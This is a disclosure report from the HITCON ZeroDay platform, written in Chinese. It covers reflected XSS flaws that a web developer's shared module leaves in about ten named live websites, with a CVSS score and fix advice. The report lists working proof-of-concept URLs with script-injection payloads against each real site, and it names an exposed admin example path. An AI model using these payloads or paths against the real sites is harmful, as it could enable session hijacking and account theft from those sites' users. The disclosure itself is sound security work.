里陽數位科技 開發之共用模組導致大量網站出現 Reflected XSS 漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00550
  •  發信 Vendor: 里陽數位科技股份有限公司
  • Title: 里陽數位科技 開發之共用模組導致大量網站出現 Reflected XSS 漏洞
  • Introduction: 該網站開發商所開發之大量網站存在 Reflected XSS 漏洞

處理狀態

目前狀態

公開
Last Update : 2025/08/10
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/06/10 19:19:26 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/10 23:35:29 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/10 23:40:31 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/10 23:40:44 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/10 23:43:54 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/11 10:28:02 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/11 10:28:36 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/11 11:05:57 : 新提交 (由 Ren 更新此狀態)
  • 2025/06/13 14:44:44 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/19 16:44:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/19 16:44:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/19 16:44:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/10 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00550
  • 通報者:abc744587 (Ren)
  • 風險:高
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://lyons.com.tw
http://www.lapasta.com.tw
https://www.leadconsult.com.tw
https://www.gogomore.com
https://www.gcomtw.com
https://g-f-t.com.tw
https://www.cens.com
https://www.scstw.com.tw
https://www.fu-deka.com
https://eat-monkey.com

敘述

里陽數位網站開發商所設計的多個網站中,發現其共用之前端輸出模組存在反射型 XSS(Reflected Cross-Site Scripting) 弱點,攻擊者可藉由誘導使用者點擊惡意連結來執行任意 JavaScript,可能導致帳號竊取、Session 劫持等風險。

根據測試,該漏洞來自共用的網站程式架構,至少已在 10 個網站中觀察到相同的 XSS 行為與觸發位置,研判來自相同的開發模組,具有一定規模的影響。考量該公司實際承接與開發的網站數量應遠超過目前已測試者,實際受影響網站的總數量可能顯著高於目前觀察樣本,建議擴大範圍進行評估與修補。

如何確認這些網站為里陽數為所開發 (請搭配前三張截圖) :

  1. 網站的首頁中含有里陽數位之簽名。
  2. 多數受影響網站皆可觀察到存在 /lyadmin 路徑,頁面標示為「里陽網站管理系統」,顯示其為該公司所開發之共用後台架構。此外,位於 /lyadmin/modules/jsafv/examples/index.html 的頁面可在未經驗證下直接存取,初步研判為前端範例頁面,可能為開發期間遺留的測試資源。
  3. 部分受影響網站可於里陽數位官網的案例頁 www.lyons.com.tw/case.asp 中查得。根據該頁所列建置案例推估,實際由該公司所開發並部署的網站數量應不僅限於此,可能還包括未公開列出的其他客戶網站。

Payload:
https://lyons.com.tw/case.asp?NewsType="><script>alert(1)</script>aaaa
http://www.lapasta.com.tw/menu.php?id="><script>alert(1)</script>&ids=1
https://www.leadconsult.com.tw/news_view.asp?ID=119b"><script>alert(1)</script>#nv-signup
https://www.gogomore.com/talk3.asp?ID=">9453<script>alert(9453)</script>
https://www.gcomtw.com/pro_view.php?id=204a&ids="><script>alert(1)</script>321a
https://www.gcomtw.com/pro_view.php?id="><script>alert(1)</script>227&ids=380
https://g-f-t.com.tw/products-search.html?key=</div>a9453<script>alert(9453)</script>&but=
https://www.cens.com/censv1/en/exh_global.jsp?SHOW=">9453<script>alert(9453)</script>
https://www.scstw.com.tw/news.php?cate=">9453<script>alert(9453)</script>
https://eat-monkey.com (注入點於購物車的 POST 封包)
https://www.fu-deka.com (注入點於購物車的 POST 封包)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

修補建議

• 對使用者輸入進行適當的 HTML 編碼(如 htmlspecialchars()、encodeURIComponent())。
• 審查所有使用 GET 參數的前端輸出位置。
• 建議該開發商統一修補其共用模組並通知受影響網站業主。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;